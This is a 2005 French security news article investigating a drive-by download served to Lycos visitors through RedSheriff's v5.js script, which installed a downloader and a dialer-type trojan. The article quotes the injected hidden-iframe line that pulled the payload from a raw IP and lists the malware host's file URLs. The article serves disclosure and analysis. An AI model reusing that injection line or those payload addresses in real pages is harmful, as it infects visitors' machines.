Actualité

 

Exclu ZATAZ : Des pirates sur la ligne ?

Publié le 10-07-2005 à 00:00:00 dans le thème Réseau - Sécurité

Pays : International - Auteur : Damien Bancal


Pub : Logiciels de sécurité et de protection Internet


Note des lecteurs: 2.5/5

Sylla1337 est un surfeur comme il en existe des millions sur Internet. Seulement, lui, il s'est étonné de l'étrange manége de son ordinateur alors qu'il visitait le portail Lycos France. "Je me baladais sur http://www.multimania.lycos.fr/ quand tout à coup un programme a tenté de se connecter à Internet. C'est plutôt louche, je refuse d'autant plus que le programme en question s'appelait bla.exe. Je fais une recherche sur mon disque dur et je découvre ce fameux bla.exe."
Nous allons suivre l'itinéraire emprunté par Sylla1337. Depuis, une question nous taraude : DDB, Lycos et RedSheriff ont-ils servi à un piratage de masse visant plusieurs dizaines de millions d'Internautes ?


Notre aventure débute avec deux nvigateurs tests, Firefox et Internet Explorer. Ils vont nous permettre de débuter notre enquête. Pour cela, nous allons tester cette étrange intrusion à partir de trois machines. La premiére n'a pas d'antivirus. La seconde est équipée de Norton Antivirus 2005. La troisième machine est installée avec Bitdefenders pro 8. Premiére constatation, en nous rendant sur Lycos, effectivement, un programme tente de s'initier dans nos trois ordinateurs. Bitdefenders va d'ailleurs nous alerter d'une tentative d'intrusion par le cheval de Troie BehavesLike:Trojan.Downloader.




Les logs du firewall

Norton ne va rien détecter et la code malicieux va s'installer sur les deux autres PC. Un petit logiciel de quelques kilos octets, bla.exe, a été installé sur le disque dur principal, C:/. "J'ai effectué des tests depuis deux sites hébergés chez Multimania Lycos et depuis le portail de Lycos. Les résultats sont identiques. Le téléchargement se fait à partir du script qui est installé en bas de page de Lycos. Un script qui est aussi imposé dans les pages personnelles. Il est à rajouter en bas de page" confie Salyy1337. Effectivement, dans le code source de ce script, il est baptisé V5.js, nous y reviendrons, apparaît la signature de la société australienne Redsheriff : "// RedSheriff Customer Intelligence - V5 // COPYRIGHT 2003 RedSheriff Limited."



Sheriff, fais-moi peur
RedSheriff est l'un des principaux fournisseurs mondiaux de données sur le recensement des visites d'Internet axé sur les sites. Cette société appartient aujourd'hui à Nielsen//NetRatings. Un géant de l'Internet spécialisé dans le placement rapide et efficace de publicités, panneaux et autres sites intégrés pour les solutions de recensement des visites d'Internet. De là à dire que Redsheriff utilise des méthodes illégales pour obtenir des informations sur les visiteurs il y a un grand pas. Et nous allons le franchir avec ce qui va suivre.



En regardant de plus prêt le code source de Lycos, il faut savoir que c'est l'ensemble des Lycos en Europe qui portent ce code, on découvre en fin de page qu'un Java Script (V5.JS) est exécuté via un serveur de Redsheriff (http://secure-uk.imrworldwide.com/v5.js). A noter que ce code java est appelé sur l'ensemble des serveurs Lycos de part le monde. Fait plutôt troublant, lors de nos tests, nous avons effectuées deux visites. La premiére, vendredi jour de l'alerte de notre lecteur, et le samedi aprés-midi suivant. Durant ces 24 heures, le code v5.js avait changé. Une ligne avait disparu. Vous nous connaissez, nous sauvegardons pour analyse, surtout quand un doute nous assaille. La ligne était la suivante : if(_rsCT=='modem')document.write('<iframe style="visibility:hidden" width=0 eight=0 src="http://209.225.34.37/c/"></iframe>');

L'ip donné dans cette ligne "fantôme" renvoyait sur un autre serveur qui allait chercher le fameux programme Bla.exe. Même si le code source de v5.js a changé, le serveur "pirate" lui est toujours actif et nous a permis de confirmer que nous n'avions pas rêvé. Nous avons décortiqué nos deux Bla.exe récupérés sur les deux machines tests qui ont laissé passé l'intru. Nous avons aussi travaillé sur le fichier de Sylla1337. Première constatation, les trois Bla.exe sont identiques. Une fois exécutés, ils vont chercher un second programme, tout aussi infecté, baptisé w.exe. Voilà qui commence à faire beaucoup pour une société qui n'est censé diffuser que des cookies pour des analyses marketing et autres diffusions publicitaires. Etonnant méthode, d'autant plus qu'apparaît dans ce grand merdier électronique une agence de publicité connue mondialement, DDB WorldWide.


Que viennent donc faire ces vendeurs de rêve dans cette intrusion informatique, qui pour rappel est punie par la loi ? DDB WorldWide est le propriétaire du serveur ayant pour mission d'infecter les machines de visiteurs. Comme le montre notre capture écran ci-dessus, l'adresse http://209.225.34.37, renvoie sur une page en construction de la société DDB WorldWide. Fait bizarre, le serveur officiel de DDB est nommé Tribal DDB, on peut d'ailleur y trouver un site de l'US Air Force ou encore de Pepsi Cola. Quel est donc ce mystérieux serveur en construction hébergé, lui, chez Savvis ?

En regardant de plus prêt les informations des codes sources de V5.js et de Bla.exe nous arrivons donc sur http://209.225.34.37/c/ et http://209.225.34.37/c/l.php. Dans ce second cas, le fichier PHP a disparu (Nous l'avons sauvegardé, ndr), l'applet qu'il téléchargeait était doté d'une fonction "doShit". Cette fonction avait pour mission de perturber les sécurités Java de l'ordinateur cible. Elle permettait de télécharger, entre autre, le programme my.class, nous allons y revenir. Deux autres class sont encore disponible sur le serveur Savvis de DDB : http://209.225.34.37/c/jvm.class et http://209.225.34.37/c/Beyond.class. Ces deux fichiers utilisent aussi l'exploit cité ci-dessus. Pour le Beyond.class, par exemple, nous avons découvert qu'il permet d'outrepasser les sécurités de Windows. Un .Class qui va, lui aussi, chercher my.class (http://209.225.34.37/c/d/my.class) qui n'est rien d'autre que notre fameux trojan bla.exe.




Le fichier w.exe est encore plus étrange (Voir notre capture ci-dessus, ndr). En le désassemblant nous nous retrouvons avec un merdier numérique difficilement compréhensible à notre niveau. Chose est certaine, nous avons à faire au cheval de Troie Trojan.Small.bce. Ce fichier fait appel à la base de registre mais également à la librairie WININET et à sa fonction OpenInternetA. Ce qui nous semble plus inquiétant est l'ensemble des mots inscrits dans ce code : "Internet Explorer", "dial" ou encore "phone". Sans parler des accés à c:\winamp.exe ou encore c:\winampa.exe.

Bref, nous avons à faire, semble-t-il, à des techniques employées pour diffuser et installer des dialers, ces petits programmes qui déconnectent les internautes ayant encore un modem 56 K pour les diriger vers une ligne sur-taxée. Pour en savoir plus sur ces dialers, voir nos divers reportages sur le sujet, ici, ici ou encore ici.

Bla, bla, bla technique

Bla.exe, charge la fonction URLDownloadToFileA de URLMON.DLL et télécharge informations à partir de l'IP de DDB de Savvis. A noter tout de meme que le nom de la fonction URLDownloadToFileA et l'url de téléchargement sont cryptées dans l'executable. Preuve qu'il y a tentative de cacher l'acte et la mission de cette intrusion.


W.exe, est un executable de type spyware, compacté (packé) avec un logiciel de type UPX modifié. Une fois décompacté, depacké, on y voit un peu plus clair, mais là encore subsistent des chaines cachées et/ou encryptées. Pourquoi ? Nous n'avons pas la réponse. Le code est assez difficile en raison de certaines techniques de programmation employées. Chose est certaine ces programmes sont fait pour collecter des informations sur le serfeur infecté comme des données personnels et aussi aux connections d'accés reseaux, dont il envoie toutes les caracteristiques à ses maîtres.

Même pas peur ? En fait si, beaucoup !

Voilà qui est loin d'être rassurant, n'est ce pas ? Chose est certaine, notre découverte approuve l'analyse de Symantec de novembre 2004 expliquant de 76 % des Pc de la planéte étaient infectés par un spyware (lire). Encore moins rassurant, ce fameux v5.js qui a permis les intrusions est installé sur l'ensemble des sites Lycos de part la planéte. Soit des millions de victimes potentielles. Sans parler des autres portails qui utilisent le code de RedSheriff. En attendant, plusieurs questions nous restent à l'esprit : Lycos a diffusé des outils que l'on peut considérer comme pirate sans le savoir ? De puis combien de temps ? Les Australiens de RedSheriff sont-ils au courant que leur client américain de DDB WorldWide diffuse un cheval de Troie en utilisant leur code source comme vecteur d'accés ? La société DDB WorldWide a-t-elle été piratée ? Beaucoup de questions que nous avons posé aux interressés.

Suite...
Comme a son accoutumé l'équipe de Lycos France a réagi vite et bien. Le Directeur Technique Lycos France, pour la partie portail internet, a lancé une enquête interne. Nous lui avons transmis toutes les données en notre possession. "Nous souhaitons avoir le maximum d'informations pour aboutir à quelque chose de concret le plus rapidement possible", nous a-t-il confié.

Ps : Nous gardons à disposition les codes sources, fichiers infectés et captures écrans.

 

Conseiller cet article RSS ZATAZ Digger cet article ! Partager cet article avec mes amis sur Facebook ! Partager cet article sur del.icio.us

Derniers contenus

Fuite de données d'auditeurs de France Info

29-04-2014 à 12:55 - 0 commentaire(s)

Ip, mail et système informatique des auditeurs web de France Info accessibles aux pirates.

Problème de sécurité pour M6 Boutique

29-04-2014 à 12:10 - 0 commentaire(s)

Un bug sur le site web de M6 Boutique pourrait permettre de piéger les clients de cet espace de télé achat.

Le contrôleur Européen de la Protection des Données a des fuites

29-04-2014 à 11:50 - 0 commentaire(s)

Le site Internet du Gardien Européen de la protection des données personnelles a des problèmes avec sa propre sécurité informatique.

Watch Dogs : plusieurs failles corrigées pour Chicago

28-04-2014 à 14:19 - 0 commentaire(s)

Plusieurs importants sites de la Ville de Chicago corrigés via le protocole d'alerte de zataz.

66 pays visés par un code malveillant dédié aux SMS

28-04-2014 à 11:51 - 0 commentaire(s)

SMS Android OS FakeInst, un logiciel malveillant qui utilise vos SMS pour détourner de l'argent.

Anonymous lance le projet AirChat

28-04-2014 à 11:40 - 0 commentaire(s)

AirChat, un projet Anonymous qui souhaite permettre la diffusion de données numériques par la bande FM.

Google rembourse des utilisateurs d'Android

28-04-2014 à 11:16 - 0 commentaire(s)

Un virus informatique cachée dans une application Android ? Google s'excuse et rembourse les internautes piégés.

Piratage d'une Université pour fabriquer des bitcoins

28-04-2014 à 11:02 - 0 commentaire(s)

Des pirates informatiques ont compromis cinq serveurs de l'Université de l'Iowa pour installer une fabrique de bitcoins.

Sur le même thème : Réseau - Sécurité

Fuite de données d'auditeurs de France Info

Ip, mail et système informatique des auditeurs web de France Info accessibles aux pirates.

Problème de sécurité pour M6 Boutique

Un bug sur le site web de M6 Boutique pourrait permettre de piéger les clients de cet espace de télé achat.

Le contrôleur Européen de la Protection des Données a des fuites

Le site Internet du Gardien Européen de la protection des données personnelles a des problèmes avec sa propre sécurité informatique.

Watch Dogs : plusieurs failles corrigées pour Chicago

Plusieurs importants sites de la Ville de Chicago corrigés via le protocole d'alerte de zataz.

Fuite de données possible via une faille Adobe Reader Android

Un PDF piégé pourrait compromettre vos données sauvegardées dans votre tablette ou smartphone sous Android.

Piratage de données bancaires chez LaCie

LaCie, fabricant de disques durs et systèmes de stockages numériques infiltré pendant 1 an... avant de s'en appercevoir.

La nouvelle secrétaire d'Etat au numérique a un site web aware

Axelle Lemaire, la toute fraîche nouvelle secrétaire d'Etat au numérique a du boulot sur la planche... en débutant par son site web.

Faille SSL, et si la NSA était au courant !

Yahoo!, Oracle, et des centaines de sites web faillibles à une vulnérabilité visant OpenSSL.

 


Syndication RSS

nabaztag

  • http://www.wikio.fr
  • netvibes
  • NewsGator Online
  • Rojo
  • Bloglines
  • Google

ZATAZ mobile et PDA